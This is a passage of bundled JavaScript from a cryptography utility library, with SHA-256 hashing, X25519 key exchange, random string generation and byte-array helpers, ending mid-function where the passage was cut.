/** 62 alphanumeric characters for default charset of randomString() */ const $73945d82524e104e$var$ALPHANUMERIC = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
/**
 * Returns a uniform random string of the given length
 * with characters from the given charset.
 *
 * Charset must not have more than 256 characters.
 *
 * Default charset generates case-sensitive alphanumeric
 * strings (0-9, A-Z, a-z).
 */ function $73945d82524e104e$var$randomString(length, charset = $73945d82524e104e$var$ALPHANUMERIC, prng = $73945d82524e104e$exports.defaultRandomSource) {
    if (charset.length < 2) throw new Error("randomString charset is too short");
    if (charset.length > 256) throw new Error("randomString charset is too long");
    let out = "";
    const charsLen = charset.length;
    const maxByte = 256 - 256 % charsLen;
    while(length > 0){
        const buf = $73945d82524e104e$var$randomBytes(Math.ceil(length * 256 / maxByte), prng);
        for(let i = 0; i < buf.length && length > 0; i++){
            const randomByte = buf[i];
            if (randomByte < maxByte) {
                out += charset.charAt(randomByte % charsLen);
                length--;
            }
        }
        (0, $276678191c4bdb56$exports.wipe)(buf);
    }
    return out;
}
$73945d82524e104e$exports.randomString = $73945d82524e104e$var$randomString;
/**
 * Returns uniform random string containing at least the given
 * number of bits of entropy.
 *
 * For example, randomStringForEntropy(128) will return a 22-character
 * alphanumeric string, while randomStringForEntropy(128, "0123456789")
 * will return a 39-character numeric string, both will contain at
 * least 128 bits of entropy.
 *
 * Default charset generates case-sensitive alphanumeric
 * strings (0-9, A-Z, a-z).
 */ function $73945d82524e104e$var$randomStringForEntropy(bits, charset = $73945d82524e104e$var$ALPHANUMERIC, prng = $73945d82524e104e$exports.defaultRandomSource) {
    const length = Math.ceil(bits / (Math.log(charset.length) / Math.LN2));
    return $73945d82524e104e$var$randomString(length, charset, prng);
}
$73945d82524e104e$exports.randomStringForEntropy = $73945d82524e104e$var$randomStringForEntropy;


var $66651f7624f8a7c0$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($66651f7624f8a7c0$exports, "__esModule", {
    value: true
});


$66651f7624f8a7c0$exports.DIGEST_LENGTH = 32;
$66651f7624f8a7c0$exports.BLOCK_SIZE = 64;
/**
 * SHA2-256 cryptographic hash algorithm.
 */ var $66651f7624f8a7c0$var$SHA256 = /** @class */ function() {
    function SHA256() {
        /** Length of hash output */ this.digestLength = $66651f7624f8a7c0$exports.DIGEST_LENGTH;
        /** Block size */ this.blockSize = $66651f7624f8a7c0$exports.BLOCK_SIZE;
        // Note: Int32Array is used instead of Uint32Array for performance reasons.
        this._state = new Int32Array(8); // hash state
        this._temp = new Int32Array(64); // temporary state
        this._buffer = new Uint8Array(128); // buffer for data to hash
        this._bufferLength = 0; // number of bytes in buffer
        this._bytesHashed = 0; // number of total bytes hashed
        this._finished = false; // indicates whether the hash was finalized
        this.reset();
    }
    SHA256.prototype._initState = function() {
        this._state[0] = 0x6a09e667;
        this._state[1] = 0xbb67ae85;
        this._state[2] = 0x3c6ef372;
        this._state[3] = 0xa54ff53a;
        this._state[4] = 0x510e527f;
        this._state[5] = 0x9b05688c;
        this._state[6] = 0x1f83d9ab;
        this._state[7] = 0x5be0cd19;
    };
    /**
     * Resets hash state making it possible
     * to re-use this instance to hash other data.
     */ SHA256.prototype.reset = function() {
        this._initState();
        this._bufferLength = 0;
        this._bytesHashed = 0;
        this._finished = false;
        return this;
    };
    /**
     * Cleans internal buffers and resets hash state.
     */ SHA256.prototype.clean = function() {
        $276678191c4bdb56$exports.wipe(this._buffer);
        $276678191c4bdb56$exports.wipe(this._temp);
        this.reset();
    };
    /**
     * Updates hash state with the given data.
     *
     * Throws error when trying to update already finalized hash:
     * instance must be reset to update it again.
     */ SHA256.prototype.update = function(data, dataLength) {
        if (dataLength === void 0) dataLength = data.length;
        if (this._finished) throw new Error("SHA256: can't update because hash was finished.");
        var dataPos = 0;
        this._bytesHashed += dataLength;
        if (this._bufferLength > 0) {
            while(this._bufferLength < this.blockSize && dataLength > 0){
                this._buffer[this._bufferLength++] = data[dataPos++];
                dataLength--;
            }
            if (this._bufferLength === this.blockSize) {
                $66651f7624f8a7c0$var$hashBlocks(this._temp, this._state, this._buffer, 0, this.blockSize);
                this._bufferLength = 0;
            }
        }
        if (dataLength >= this.blockSize) {
            dataPos = $66651f7624f8a7c0$var$hashBlocks(this._temp, this._state, data, dataPos, dataLength);
            dataLength %= this.blockSize;
        }
        while(dataLength > 0){
            this._buffer[this._bufferLength++] = data[dataPos++];
            dataLength--;
        }
        return this;
    };
    /**
     * Finalizes hash state and puts hash into out.
     * If hash was already finalized, puts the same value.
     */ SHA256.prototype.finish = function(out) {
        if (!this._finished) {
            var bytesHashed = this._bytesHashed;
            var left = this._bufferLength;
            var bitLenHi = bytesHashed / 0x20000000 | 0;
            var bitLenLo = bytesHashed << 3;
            var padLength = bytesHashed % 64 < 56 ? 64 : 128;
            this._buffer[left] = 0x80;
            for(var i = left + 1; i < padLength - 8; i++)this._buffer[i] = 0;
            $ddd89ca0ca71c6d3$exports.writeUint32BE(bitLenHi, this._buffer, padLength - 8);
            $ddd89ca0ca71c6d3$exports.writeUint32BE(bitLenLo, this._buffer, padLength - 4);
            $66651f7624f8a7c0$var$hashBlocks(this._temp, this._state, this._buffer, 0, padLength);
            this._finished = true;
        }
        for(var i = 0; i < this.digestLength / 4; i++)$ddd89ca0ca71c6d3$exports.writeUint32BE(this._state[i], out, i * 4);
        return this;
    };
    /**
     * Returns the final hash digest.
     */ SHA256.prototype.digest = function() {
        var out = new Uint8Array(this.digestLength);
        this.finish(out);
        return out;
    };
    /**
     * Function useful for HMAC/PBKDF2 optimization.
     * Returns hash state to be used with restoreState().
     * Only chain value is saved, not buffers or other
     * state variables.
     */ SHA256.prototype.saveState = function() {
        if (this._finished) throw new Error("SHA256: cannot save finished state");
        return {
            state: new Int32Array(this._state),
            buffer: this._bufferLength > 0 ? new Uint8Array(this._buffer) : undefined,
            bufferLength: this._bufferLength,
            bytesHashed: this._bytesHashed
        };
    };
    /**
     * Function useful for HMAC/PBKDF2 optimization.
     * Restores state saved by saveState() and sets bytesHashed
     * to the given value.
     */ SHA256.prototype.restoreState = function(savedState) {
        this._state.set(savedState.state);
        this._bufferLength = savedState.bufferLength;
        if (savedState.buffer) this._buffer.set(savedState.buffer);
        this._bytesHashed = savedState.bytesHashed;
        this._finished = false;
        return this;
    };
    /**
     * Cleans state returned by saveState().
     */ SHA256.prototype.cleanSavedState = function(savedState) {
        $276678191c4bdb56$exports.wipe(savedState.state);
        if (savedState.buffer) $276678191c4bdb56$exports.wipe(savedState.buffer);
        savedState.bufferLength = 0;
        savedState.bytesHashed = 0;
    };
    return SHA256;
}();
$66651f7624f8a7c0$exports.SHA256 = $66651f7624f8a7c0$var$SHA256;
// Constants
var $66651f7624f8a7c0$var$K = new Int32Array([
    0x428a2f98,
    0x71374491,
    0xb5c0fbcf,
    0xe9b5dba5,
    0x3956c25b,
    0x59f111f1,
    0x923f82a4,
    0xab1c5ed5,
    0xd807aa98,
    0x12835b01,
    0x243185be,
    0x550c7dc3,
    0x72be5d74,
    0x80deb1fe,
    0x9bdc06a7,
    0xc19bf174,
    0xe49b69c1,
    0xefbe4786,
    0x0fc19dc6,
    0x240ca1cc,
    0x2de92c6f,
    0x4a7484aa,
    0x5cb0a9dc,
    0x76f988da,
    0x983e5152,
    0xa831c66d,
    0xb00327c8,
    0xbf597fc7,
    0xc6e00bf3,
    0xd5a79147,
    0x06ca6351,
    0x14292967,
    0x27b70a85,
    0x2e1b2138,
    0x4d2c6dfc,
    0x53380d13,
    0x650a7354,
    0x766a0abb,
    0x81c2c92e,
    0x92722c85,
    0xa2bfe8a1,
    0xa81a664b,
    0xc24b8b70,
    0xc76c51a3,
    0xd192e819,
    0xd6990624,
    0xf40e3585,
    0x106aa070,
    0x19a4c116,
    0x1e376c08,
    0x2748774c,
    0x34b0bcb5,
    0x391c0cb3,
    0x4ed8aa4a,
    0x5b9cca4f,
    0x682e6ff3,
    0x748f82ee,
    0x78a5636f,
    0x84c87814,
    0x8cc70208,
    0x90befffa,
    0xa4506ceb,
    0xbef9a3f7,
    0xc67178f2
]);
function $66651f7624f8a7c0$var$hashBlocks(w, v, p, pos, len) {
    while(len >= 64){
        var a = v[0];
        var b = v[1];
        var c = v[2];
        var d = v[3];
        var e = v[4];
        var f = v[5];
        var g = v[6];
        var h = v[7];
        for(var i = 0; i < 16; i++){
            var j = pos + i * 4;
            w[i] = $ddd89ca0ca71c6d3$exports.readUint32BE(p, j);
        }
        for(var i = 16; i < 64; i++){
            var u = w[i - 2];
            var t1 = (u >>> 17 | u << 15) ^ (u >>> 19 | u << 13) ^ u >>> 10;
            u = w[i - 15];
            var t2 = (u >>> 7 | u << 25) ^ (u >>> 18 | u << 14) ^ u >>> 3;
            w[i] = (t1 + w[i - 7] | 0) + (t2 + w[i - 16] | 0);
        }
        for(var i = 0; i < 64; i++){
            var t1 = (((e >>> 6 | e << 26) ^ (e >>> 11 | e << 21) ^ (e >>> 25 | e << 7)) + (e & f ^ ~e & g) | 0) + (h + ($66651f7624f8a7c0$var$K[i] + w[i] | 0) | 0) | 0;
            var t2 = ((a >>> 2 | a << 30) ^ (a >>> 13 | a << 19) ^ (a >>> 22 | a << 10)) + (a & b ^ a & c ^ b & c) | 0;
            h = g;
            g = f;
            f = e;
            e = d + t1 | 0;
            d = c;
            c = b;
            b = a;
            a = t1 + t2 | 0;
        }
        v[0] += a;
        v[1] += b;
        v[2] += c;
        v[3] += d;
        v[4] += e;
        v[5] += f;
        v[6] += g;
        v[7] += h;
        pos += 64;
        len -= 64;
    }
    return pos;
}
function $66651f7624f8a7c0$var$hash(data) {
    var h = new $66651f7624f8a7c0$var$SHA256();
    h.update(data);
    var digest = h.digest();
    h.clean();
    return digest;
}
$66651f7624f8a7c0$exports.hash = $66651f7624f8a7c0$var$hash;


var $569072827d3d60aa$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($569072827d3d60aa$exports, "__esModule", {
    value: true
});
$569072827d3d60aa$exports.sharedKey = $569072827d3d60aa$exports.generateKeyPair = $569072827d3d60aa$exports.generateKeyPairFromSeed = $569072827d3d60aa$exports.scalarMultBase = $569072827d3d60aa$exports.scalarMult = $569072827d3d60aa$exports.SHARED_KEY_LENGTH = $569072827d3d60aa$exports.SECRET_KEY_LENGTH = $569072827d3d60aa$exports.PUBLIC_KEY_LENGTH = void 0;


$569072827d3d60aa$exports.PUBLIC_KEY_LENGTH = 32;
$569072827d3d60aa$exports.SECRET_KEY_LENGTH = 32;
$569072827d3d60aa$exports.SHARED_KEY_LENGTH = 32;
// Returns new zero-filled 16-element GF (Float64Array).
// If passed an array of numbers, prefills the returned
// array with them.
//
// We use Float64Array, because we need 48-bit numbers
// for this implementation.
function $569072827d3d60aa$var$gf(init) {
    const r = new Float64Array(16);
    if (init) for(let i = 0; i < init.length; i++)r[i] = init[i];
    return r;
}
// Base point.
const $569072827d3d60aa$var$_9 = new Uint8Array(32);
$569072827d3d60aa$var$_9[0] = 9;
const $569072827d3d60aa$var$_121665 = $569072827d3d60aa$var$gf([
    0xdb41,
    1
]);
function $569072827d3d60aa$var$car25519(o) {
    let c = 1;
    for(let i = 0; i < 16; i++){
        let v = o[i] + c + 65535;
        c = Math.floor(v / 65536);
        o[i] = v - c * 65536;
    }
    o[0] += c - 1 + 37 * (c - 1);
}
function $569072827d3d60aa$var$sel25519(p, q, b) {
    const c = ~(b - 1);
    for(let i = 0; i < 16; i++){
        const t = c & (p[i] ^ q[i]);
        p[i] ^= t;
        q[i] ^= t;
    }
}
function $569072827d3d60aa$var$pack25519(o, n) {
    const m = $569072827d3d60aa$var$gf();
    const t = $569072827d3d60aa$var$gf();
    for(let i = 0; i < 16; i++)t[i] = n[i];
    $569072827d3d60aa$var$car25519(t);
    $569072827d3d60aa$var$car25519(t);
    $569072827d3d60aa$var$car25519(t);
    for(let j = 0; j < 2; j++){
        m[0] = t[0] - 0xffed;
        for(let i = 1; i < 15; i++){
            m[i] = t[i] - 0xffff - (m[i - 1] >> 16 & 1);
            m[i - 1] &= 0xffff;
        }
        m[15] = t[15] - 0x7fff - (m[14] >> 16 & 1);
        const b = m[15] >> 16 & 1;
        m[14] &= 0xffff;
        $569072827d3d60aa$var$sel25519(t, m, 1 - b);
    }
    for(let i = 0; i < 16; i++){
        o[2 * i] = t[i] & 0xff;
        o[2 * i + 1] = t[i] >> 8;
    }
}
function $569072827d3d60aa$var$unpack25519(o, n) {
    for(let i = 0; i < 16; i++)o[i] = n[2 * i] + (n[2 * i + 1] << 8);
    o[15] &= 0x7fff;
}
function $569072827d3d60aa$var$add(o, a, b) {
    for(let i = 0; i < 16; i++)o[i] = a[i] + b[i];
}
function $569072827d3d60aa$var$sub(o, a, b) {
    for(let i = 0; i < 16; i++)o[i] = a[i] - b[i];
}
function $569072827d3d60aa$var$mul(o, a, b) {
    let v, c, t0 = 0, t1 = 0, t2 = 0, t3 = 0, t4 = 0, t5 = 0, t6 = 0, t7 = 0, t8 = 0, t9 = 0, t10 = 0, t11 = 0, t12 = 0, t13 = 0, t14 = 0, t15 = 0, t16 = 0, t17 = 0, t18 = 0, t19 = 0, t20 = 0, t21 = 0, t22 = 0, t23 = 0, t24 = 0, t25 = 0, t26 = 0, t27 = 0, t28 = 0, t29 = 0, t30 = 0, b0 = b[0], b1 = b[1], b2 = b[2], b3 = b[3], b4 = b[4], b5 = b[5], b6 = b[6], b7 = b[7], b8 = b[8], b9 = b[9], b10 = b[10], b11 = b[11], b12 = b[12], b13 = b[13], b14 = b[14], b15 = b[15];
    v = a[0];
    t0 += v * b0;
    t1 += v * b1;
    t2 += v * b2;
    t3 += v * b3;
    t4 += v * b4;
    t5 += v * b5;
    t6 += v * b6;
    t7 += v * b7;
    t8 += v * b8;
    t9 += v * b9;
    t10 += v * b10;
    t11 += v * b11;
    t12 += v * b12;
    t13 += v * b13;
    t14 += v * b14;
    t15 += v * b15;
    v = a[1];
    t1 += v * b0;
    t2 += v * b1;
    t3 += v * b2;
    t4 += v * b3;
    t5 += v * b4;
    t6 += v * b5;
    t7 += v * b6;
    t8 += v * b7;
    t9 += v * b8;
    t10 += v * b9;
    t11 += v * b10;
    t12 += v * b11;
    t13 += v * b12;
    t14 += v * b13;
    t15 += v * b14;
    t16 += v * b15;
    v = a[2];
    t2 += v * b0;
    t3 += v * b1;
    t4 += v * b2;
    t5 += v * b3;
    t6 += v * b4;
    t7 += v * b5;
    t8 += v * b6;
    t9 += v * b7;
    t10 += v * b8;
    t11 += v * b9;
    t12 += v * b10;
    t13 += v * b11;
    t14 += v * b12;
    t15 += v * b13;
    t16 += v * b14;
    t17 += v * b15;
    v = a[3];
    t3 += v * b0;
    t4 += v * b1;
    t5 += v * b2;
    t6 += v * b3;
    t7 += v * b4;
    t8 += v * b5;
    t9 += v * b6;
    t10 += v * b7;
    t11 += v * b8;
    t12 += v * b9;
    t13 += v * b10;
    t14 += v * b11;
    t15 += v * b12;
    t16 += v * b13;
    t17 += v * b14;
    t18 += v * b15;
    v = a[4];
    t4 += v * b0;
    t5 += v * b1;
    t6 += v * b2;
    t7 += v * b3;
    t8 += v * b4;
    t9 += v * b5;
    t10 += v * b6;
    t11 += v * b7;
    t12 += v * b8;
    t13 += v * b9;
    t14 += v * b10;
    t15 += v * b11;
    t16 += v * b12;
    t17 += v * b13;
    t18 += v * b14;
    t19 += v * b15;
    v = a[5];
    t5 += v * b0;
    t6 += v * b1;
    t7 += v * b2;
    t8 += v * b3;
    t9 += v * b4;
    t10 += v * b5;
    t11 += v * b6;
    t12 += v * b7;
    t13 += v * b8;
    t14 += v * b9;
    t15 += v * b10;
    t16 += v * b11;
    t17 += v * b12;
    t18 += v * b13;
    t19 += v * b14;
    t20 += v * b15;
    v = a[6];
    t6 += v * b0;
    t7 += v * b1;
    t8 += v * b2;
    t9 += v * b3;
    t10 += v * b4;
    t11 += v * b5;
    t12 += v * b6;
    t13 += v * b7;
    t14 += v * b8;
    t15 += v * b9;
    t16 += v * b10;
    t17 += v * b11;
    t18 += v * b12;
    t19 += v * b13;
    t20 += v * b14;
    t21 += v * b15;
    v = a[7];
    t7 += v * b0;
    t8 += v * b1;
    t9 += v * b2;
    t10 += v * b3;
    t11 += v * b4;
    t12 += v * b5;
    t13 += v * b6;
    t14 += v * b7;
    t15 += v * b8;
    t16 += v * b9;
    t17 += v * b10;
    t18 += v * b11;
    t19 += v * b12;
    t20 += v * b13;
    t21 += v * b14;
    t22 += v * b15;
    v = a[8];
    t8 += v * b0;
    t9 += v * b1;
    t10 += v * b2;
    t11 += v * b3;
    t12 += v * b4;
    t13 += v * b5;
    t14 += v * b6;
    t15 += v * b7;
    t16 += v * b8;
    t17 += v * b9;
    t18 += v * b10;
    t19 += v * b11;
    t20 += v * b12;
    t21 += v * b13;
    t22 += v * b14;
    t23 += v * b15;
    v = a[9];
    t9 += v * b0;
    t10 += v * b1;
    t11 += v * b2;
    t12 += v * b3;
    t13 += v * b4;
    t14 += v * b5;
    t15 += v * b6;
    t16 += v * b7;
    t17 += v * b8;
    t18 += v * b9;
    t19 += v * b10;
    t20 += v * b11;
    t21 += v * b12;
    t22 += v * b13;
    t23 += v * b14;
    t24 += v * b15;
    v = a[10];
    t10 += v * b0;
    t11 += v * b1;
    t12 += v * b2;
    t13 += v * b3;
    t14 += v * b4;
    t15 += v * b5;
    t16 += v * b6;
    t17 += v * b7;
    t18 += v * b8;
    t19 += v * b9;
    t20 += v * b10;
    t21 += v * b11;
    t22 += v * b12;
    t23 += v * b13;
    t24 += v * b14;
    t25 += v * b15;
    v = a[11];
    t11 += v * b0;
    t12 += v * b1;
    t13 += v * b2;
    t14 += v * b3;
    t15 += v * b4;
    t16 += v * b5;
    t17 += v * b6;
    t18 += v * b7;
    t19 += v * b8;
    t20 += v * b9;
    t21 += v * b10;
    t22 += v * b11;
    t23 += v * b12;
    t24 += v * b13;
    t25 += v * b14;
    t26 += v * b15;
    v = a[12];
    t12 += v * b0;
    t13 += v * b1;
    t14 += v * b2;
    t15 += v * b3;
    t16 += v * b4;
    t17 += v * b5;
    t18 += v * b6;
    t19 += v * b7;
    t20 += v * b8;
    t21 += v * b9;
    t22 += v * b10;
    t23 += v * b11;
    t24 += v * b12;
    t25 += v * b13;
    t26 += v * b14;
    t27 += v * b15;
    v = a[13];
    t13 += v * b0;
    t14 += v * b1;
    t15 += v * b2;
    t16 += v * b3;
    t17 += v * b4;
    t18 += v * b5;
    t19 += v * b6;
    t20 += v * b7;
    t21 += v * b8;
    t22 += v * b9;
    t23 += v * b10;
    t24 += v * b11;
    t25 += v * b12;
    t26 += v * b13;
    t27 += v * b14;
    t28 += v * b15;
    v = a[14];
    t14 += v * b0;
    t15 += v * b1;
    t16 += v * b2;
    t17 += v * b3;
    t18 += v * b4;
    t19 += v * b5;
    t20 += v * b6;
    t21 += v * b7;
    t22 += v * b8;
    t23 += v * b9;
    t24 += v * b10;
    t25 += v * b11;
    t26 += v * b12;
    t27 += v * b13;
    t28 += v * b14;
    t29 += v * b15;
    v = a[15];
    t15 += v * b0;
    t16 += v * b1;
    t17 += v * b2;
    t18 += v * b3;
    t19 += v * b4;
    t20 += v * b5;
    t21 += v * b6;
    t22 += v * b7;
    t23 += v * b8;
    t24 += v * b9;
    t25 += v * b10;
    t26 += v * b11;
    t27 += v * b12;
    t28 += v * b13;
    t29 += v * b14;
    t30 += v * b15;
    t0 += 38 * t16;
    t1 += 38 * t17;
    t2 += 38 * t18;
    t3 += 38 * t19;
    t4 += 38 * t20;
    t5 += 38 * t21;
    t6 += 38 * t22;
    t7 += 38 * t23;
    t8 += 38 * t24;
    t9 += 38 * t25;
    t10 += 38 * t26;
    t11 += 38 * t27;
    t12 += 38 * t28;
    t13 += 38 * t29;
    t14 += 38 * t30;
    // t15 left as is
    // first car
    c = 1;
    v = t0 + c + 65535;
    c = Math.floor(v / 65536);
    t0 = v - c * 65536;
    v = t1 + c + 65535;
    c = Math.floor(v / 65536);
    t1 = v - c * 65536;
    v = t2 + c + 65535;
    c = Math.floor(v / 65536);
    t2 = v - c * 65536;
    v = t3 + c + 65535;
    c = Math.floor(v / 65536);
    t3 = v - c * 65536;
    v = t4 + c + 65535;
    c = Math.floor(v / 65536);
    t4 = v - c * 65536;
    v = t5 + c + 65535;
    c = Math.floor(v / 65536);
    t5 = v - c * 65536;
    v = t6 + c + 65535;
    c = Math.floor(v / 65536);
    t6 = v - c * 65536;
    v = t7 + c + 65535;
    c = Math.floor(v / 65536);
    t7 = v - c * 65536;
    v = t8 + c + 65535;
    c = Math.floor(v / 65536);
    t8 = v - c * 65536;
    v = t9 + c + 65535;
    c = Math.floor(v / 65536);
    t9 = v - c * 65536;
    v = t10 + c + 65535;
    c = Math.floor(v / 65536);
    t10 = v - c * 65536;
    v = t11 + c + 65535;
    c = Math.floor(v / 65536);
    t11 = v - c * 65536;
    v = t12 + c + 65535;
    c = Math.floor(v / 65536);
    t12 = v - c * 65536;
    v = t13 + c + 65535;
    c = Math.floor(v / 65536);
    t13 = v - c * 65536;
    v = t14 + c + 65535;
    c = Math.floor(v / 65536);
    t14 = v - c * 65536;
    v = t15 + c + 65535;
    c = Math.floor(v / 65536);
    t15 = v - c * 65536;
    t0 += c - 1 + 37 * (c - 1);
    // second car
    c = 1;
    v = t0 + c + 65535;
    c = Math.floor(v / 65536);
    t0 = v - c * 65536;
    v = t1 + c + 65535;
    c = Math.floor(v / 65536);
    t1 = v - c * 65536;
    v = t2 + c + 65535;
    c = Math.floor(v / 65536);
    t2 = v - c * 65536;
    v = t3 + c + 65535;
    c = Math.floor(v / 65536);
    t3 = v - c * 65536;
    v = t4 + c + 65535;
    c = Math.floor(v / 65536);
    t4 = v - c * 65536;
    v = t5 + c + 65535;
    c = Math.floor(v / 65536);
    t5 = v - c * 65536;
    v = t6 + c + 65535;
    c = Math.floor(v / 65536);
    t6 = v - c * 65536;
    v = t7 + c + 65535;
    c = Math.floor(v / 65536);
    t7 = v - c * 65536;
    v = t8 + c + 65535;
    c = Math.floor(v / 65536);
    t8 = v - c * 65536;
    v = t9 + c + 65535;
    c = Math.floor(v / 65536);
    t9 = v - c * 65536;
    v = t10 + c + 65535;
    c = Math.floor(v / 65536);
    t10 = v - c * 65536;
    v = t11 + c + 65535;
    c = Math.floor(v / 65536);
    t11 = v - c * 65536;
    v = t12 + c + 65535;
    c = Math.floor(v / 65536);
    t12 = v - c * 65536;
    v = t13 + c + 65535;
    c = Math.floor(v / 65536);
    t13 = v - c * 65536;
    v = t14 + c + 65535;
    c = Math.floor(v / 65536);
    t14 = v - c * 65536;
    v = t15 + c + 65535;
    c = Math.floor(v / 65536);
    t15 = v - c * 65536;
    t0 += c - 1 + 37 * (c - 1);
    o[0] = t0;
    o[1] = t1;
    o[2] = t2;
    o[3] = t3;
    o[4] = t4;
    o[5] = t5;
    o[6] = t6;
    o[7] = t7;
    o[8] = t8;
    o[9] = t9;
    o[10] = t10;
    o[11] = t11;
    o[12] = t12;
    o[13] = t13;
    o[14] = t14;
    o[15] = t15;
}
function $569072827d3d60aa$var$square(o, a) {
    $569072827d3d60aa$var$mul(o, a, a);
}
function $569072827d3d60aa$var$inv25519(o, inp) {
    const c = $569072827d3d60aa$var$gf();
    for(let i = 0; i < 16; i++)c[i] = inp[i];
    for(let i = 253; i >= 0; i--){
        $569072827d3d60aa$var$square(c, c);
        if (i !== 2 && i !== 4) $569072827d3d60aa$var$mul(c, c, inp);
    }
    for(let i = 0; i < 16; i++)o[i] = c[i];
}
function $569072827d3d60aa$var$scalarMult(n, p) {
    const z = new Uint8Array(32);
    const x = new Float64Array(80);
    const a = $569072827d3d60aa$var$gf(), b = $569072827d3d60aa$var$gf(), c = $569072827d3d60aa$var$gf(), d = $569072827d3d60aa$var$gf(), e = $569072827d3d60aa$var$gf(), f = $569072827d3d60aa$var$gf();
    for(let i = 0; i < 31; i++)z[i] = n[i];
    z[31] = n[31] & 127 | 64;
    z[0] &= 248;
    $569072827d3d60aa$var$unpack25519(x, p);
    for(let i = 0; i < 16; i++)b[i] = x[i];
    a[0] = d[0] = 1;
    for(let i = 254; i >= 0; --i){
        const r = z[i >>> 3] >>> (i & 7) & 1;
        $569072827d3d60aa$var$sel25519(a, b, r);
        $569072827d3d60aa$var$sel25519(c, d, r);
        $569072827d3d60aa$var$add(e, a, c);
        $569072827d3d60aa$var$sub(a, a, c);
        $569072827d3d60aa$var$add(c, b, d);
        $569072827d3d60aa$var$sub(b, b, d);
        $569072827d3d60aa$var$square(d, e);
        $569072827d3d60aa$var$square(f, a);
        $569072827d3d60aa$var$mul(a, c, a);
        $569072827d3d60aa$var$mul(c, b, e);
        $569072827d3d60aa$var$add(e, a, c);
        $569072827d3d60aa$var$sub(a, a, c);
        $569072827d3d60aa$var$square(b, a);
        $569072827d3d60aa$var$sub(c, d, f);
        $569072827d3d60aa$var$mul(a, c, $569072827d3d60aa$var$_121665);
        $569072827d3d60aa$var$add(a, a, d);
        $569072827d3d60aa$var$mul(c, c, a);
        $569072827d3d60aa$var$mul(a, d, f);
        $569072827d3d60aa$var$mul(d, b, x);
        $569072827d3d60aa$var$square(b, e);
        $569072827d3d60aa$var$sel25519(a, b, r);
        $569072827d3d60aa$var$sel25519(c, d, r);
    }
    for(let i = 0; i < 16; i++){
        x[i + 16] = a[i];
        x[i + 32] = c[i];
        x[i + 48] = b[i];
        x[i + 64] = d[i];
    }
    const x32 = x.subarray(32);
    const x16 = x.subarray(16);
    $569072827d3d60aa$var$inv25519(x32, x32);
    $569072827d3d60aa$var$mul(x16, x16, x32);
    const q = new Uint8Array(32);
    $569072827d3d60aa$var$pack25519(q, x16);
    return q;
}
$569072827d3d60aa$exports.scalarMult = $569072827d3d60aa$var$scalarMult;
function $569072827d3d60aa$var$scalarMultBase(n) {
    return $569072827d3d60aa$var$scalarMult(n, $569072827d3d60aa$var$_9);
}
$569072827d3d60aa$exports.scalarMultBase = $569072827d3d60aa$var$scalarMultBase;
function $569072827d3d60aa$var$generateKeyPairFromSeed(seed) {
    if (seed.length !== $569072827d3d60aa$exports.SECRET_KEY_LENGTH) throw new Error(`x25519: seed must be ${$569072827d3d60aa$exports.SECRET_KEY_LENGTH} bytes`);
    const secretKey = new Uint8Array(seed);
    const publicKey = $569072827d3d60aa$var$scalarMultBase(secretKey);
    return {
        publicKey: publicKey,
        secretKey: secretKey
    };
}
$569072827d3d60aa$exports.generateKeyPairFromSeed = $569072827d3d60aa$var$generateKeyPairFromSeed;
function $569072827d3d60aa$var$generateKeyPair(prng) {
    const seed = (0, $73945d82524e104e$exports.randomBytes)(32, prng);
    const result = $569072827d3d60aa$var$generateKeyPairFromSeed(seed);
    (0, $276678191c4bdb56$exports.wipe)(seed);
    return result;
}
$569072827d3d60aa$exports.generateKeyPair = $569072827d3d60aa$var$generateKeyPair;
/**
 * Returns a shared key between our secret key and a peer's public key.
 *
 * Throws an error if the given keys are of wrong length.
 *
 * If rejectZero is true throws if the calculated shared key is all-zero.
 * From RFC 7748:
 *
 * > Protocol designers using Diffie-Hellman over the curves defined in
 * > this document must not assume "contributory behavior".  Specially,
 * > contributory behavior means that both parties' private keys
 * > contribute to the resulting shared key.  Since curve25519 and
 * > curve448 have cofactors of 8 and 4 (respectively), an input point of
 * > small order will eliminate any contribution from the other party's
 * > private key.  This situation can be detected by checking for the all-
 * > zero output, which implementations MAY do, as specified in Section 6.
 * > However, a large number of existing implementations do not do this.
 *
 * IMPORTANT: the returned key is a raw result of scalar multiplication.
 * To use it as a key material, hash it with a cryptographic hash function.
 */ function $569072827d3d60aa$var$sharedKey(mySecretKey, theirPublicKey, rejectZero = false) {
    if (mySecretKey.length !== $569072827d3d60aa$exports.PUBLIC_KEY_LENGTH) throw new Error("X25519: incorrect secret key length");
    if (theirPublicKey.length !== $569072827d3d60aa$exports.PUBLIC_KEY_LENGTH) throw new Error("X25519: incorrect public key length");
    const result = $569072827d3d60aa$var$scalarMult(mySecretKey, theirPublicKey);
    if (rejectZero) {
        let zeros = 0;
        for(let i = 0; i < result.length; i++)zeros |= result[i];
        if (zeros === 0) throw new Error("X25519: invalid shared key");
    }
    return result;
}
$569072827d3d60aa$exports.sharedKey = $569072827d3d60aa$var$sharedKey;


var $74e9859baf4497ef$exports = {};
"use strict";
Object.defineProperty($74e9859baf4497ef$exports, "__esModule", {
    value: true
});
var $3a397656998e9fe7$exports = {};
"use strict";
Object.defineProperty($3a397656998e9fe7$exports, "__esModule", {
    value: true
});
function $3a397656998e9fe7$var$compare(a, b) {
    for(let i = 0; i < a.byteLength; i++){
        if (a[i] < b[i]) return -1;
        if (a[i] > b[i]) return 1;
    }
    if (a.byteLength > b.byteLength) return 1;
    if (a.byteLength < b.byteLength) return -1;
    return 0;
}
$3a397656998e9fe7$exports.compare = $3a397656998e9fe7$var$compare;


var $475c4a512fd4a246$exports = {};
"use strict";
Object.defineProperty($475c4a512fd4a246$exports, "__esModule", {
    value: true
});
var $6082a548169c7b42$exports = {};
"use strict";
Object.defineProperty($6082a548169c7b42$exports, "__esModule", {
    value: true
});
var $784ac8dd0f23c14d$exports = {};
"use strict";
Object.defineProperty($784ac8dd0f23c14d$exports, "__esModule", {
    value: true
});
function $784ac8dd0f23c14d$var$asUint8Array(buf) {
    if (globalThis.Buffer != null) return new Uint8Array(buf.buffer, buf.byteOffset, buf.byteLength);
    return buf;
}
$784ac8dd0f23c14d$exports.asUint8Array = $784ac8dd0f23c14d$var$asUint8Array;


function $6082a548169c7b42$var$alloc(size = 0) {
